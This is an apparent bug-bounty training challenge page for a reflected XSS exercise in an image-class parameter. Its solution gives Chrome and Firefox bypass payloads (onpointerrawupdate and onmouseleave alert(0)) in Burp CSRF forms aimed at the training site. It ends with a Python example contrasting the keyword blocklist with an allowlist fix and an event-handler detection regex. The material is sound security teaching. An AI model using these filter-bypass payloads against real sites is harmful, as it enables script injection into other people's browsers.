Important information
Our challenges do NOT require any bruteforcing/directory fuzzing/massive amounts of traffic. Please practise hacking on our challenges manually.
Failure to abide by the rules will put you at risk of being restricted from using our free challenges.
Change the class of our image and pick your favourite!
Easy
Cross Site Scripting (XSS)
Our basic HTML web application lets you change the image's style simply by changing its class. View the various image styles and decide which you think is best!
Once you're done playing, can you find any XSS? The developers have made sure no malicious class names can be used.
Completed the challenge?
You can browse the intended solution to this challenge below.
Solution
Lots of developers rely on out-dated blocklists, or they simply only filter known-malicious event handlers such as onclick and onerror.
The mistake the developer made in this challenge is that they were filtering for specific keywords. This is a bad approach to protecting against XSS: any handler that is missing from the list goes straight through.
Chrome POC
The challenge filter can be bypassed by sending imageClass=img1"onpointerrawupdate='alert(0)'"> as the POST data, then moving your mouse over the image for the XSS to execute.
Working POC on Chrome:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form target="_blank" action="https://www.bugbountytraining.com/challenges/challenge-2.php" method="POST">
<input type="hidden" name="imageClass" value="img1&quot;onpointerrawupdate='alert(0)'&quot;>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Firefox POC
onpointerrawupdate= only fires on Chrome, so what about Firefox? Since the filter blocklist doesn't include every handler (which is why it's a bad approach), onmouseleave= works on both Firefox and Chrome:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form target="_blank" action="https://www.bugbountytraining.com/challenges/challenge-2.php" method="POST">
<input type="hidden" name="imageClass" value="img1&quot;onmouseleave='alert(0)'&quot;>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
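The weakness described in the solution (a keyword blocklist that strips onclick and onerror but nothing else) and the fix a developer should ship instead, as an added example that is not part of the challenge or its PHP source: the blocklist below is an assumed reconstruction of the filter, the class names are assumed, and the third payload is constructed to show the one case the blocklist does catch.

```python
import html
import re

# Assumed reconstruction of the challenge's filter (the real list is not shown on the page):
# a handful of well-known handler keywords are stripped and everything else is echoed back.
BLOCKED_KEYWORDS = ("onclick", "onerror", "onload", "<script")

# Hardened alternative: the application only ever offers a fixed set of classes,
# so accept those and nothing else (class names here are assumed).
ALLOWED_CLASSES = frozenset({"img1", "img2", "img3"})
DEFAULT_CLASS = "img1"

def blocklist_filter(image_class: str) -> str:
    """Vulnerable approach: remove listed keywords, then interpolate the remainder verbatim."""
    cleaned = image_class
    for kw in BLOCKED_KEYWORDS:
        cleaned = re.sub(re.escape(kw), "", cleaned, flags=re.IGNORECASE)
    return f'<img src="/pic.png" class="{cleaned}">'

def allowlist_render(image_class: str) -> str:
    """Fixed approach: allowlist the value, and still attribute-encode it on output."""
    if image_class not in ALLOWED_CLASSES:
        image_class = DEFAULT_CLASS  # fall back to a known class rather than echoing input
    return f'<img src="/pic.png" class="{html.escape(image_class, quote=True)}">'

def injects_event_handler(rendered: str) -> bool:
    """Detection helper: did an on*= attribute end up in the rendered tag?"""
    return re.search(r"\bon[a-z]+\s*=", rendered, flags=re.IGNORECASE) is not None

# The two payloads from the write-up plus one blocked one, as constructed sample input.
PAYLOADS = {
    "chrome": "img1\"onpointerrawupdate='alert(0)'\">",
    "both": "img1\"onmouseleave='alert(0)'\">",
    "blocked": "img1\"onclick='alert(0)'\">",  # the one case the blocklist does catch
}

def compare() -> dict:
    """For each payload: (survives the blocklist?, survives the allowlist?)."""
    return {
        name: (injects_event_handler(blocklist_filter(p)),
               injects_event_handler(allowlist_render(p)))
        for name, p in PAYLOADS.items()
    }

if __name__ == "__main__":
    for name, (blocklist_xss, allowlist_xss) in compare().items():
        print(f"{name:8s} blocklist-XSS={blocklist_xss}  allowlist-XSS={allowlist_xss}")
```

In a real application the allowlist check belongs server-side before the value is ever interpolated; the output encoding is kept as defence in depth, not as the primary control.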